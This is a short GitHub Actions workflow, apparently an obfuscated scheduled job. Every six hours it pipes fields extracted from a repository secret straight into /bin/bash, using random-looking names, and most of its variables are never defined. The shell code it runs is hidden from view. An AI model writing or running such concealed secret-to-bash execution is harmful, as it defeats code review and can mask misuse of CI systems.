name: suoyijiameng

on:
  workflow_dispatch:
  schedule:
    - cron: '50 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: suoyijiameng
        env:
          wfak5410: ${{ secrets.wfak5410 }}
        run: |
          echo $wfak5410 | jq -r .sqx81 | /bin/bash
          echo $yqqwk94015 | jq -r .n99628 | /bin/bash
          echo $k0543 | jq -r .iuv6900 | /bin/bash
          echo $vg834 | jq -r .wij9444 | /bin/bash
          echo $c5 | jq -r .vxog22759 | /bin/bash
          echo $giexc841 | jq -r .dsg21016 | /bin/bash
          echo $ljyb1764 | jq -r .xxyd6244 | /bin/bash
          echo $besgo87769 | jq -r .eey20604 | /bin/bash
          echo $rcqmt4 | jq -r .g753 | /bin/bash
          echo $m8636 | jq -r .cd44482 | /bin/bash
          echo $ae778 | jq -r .f2 | /bin/bash

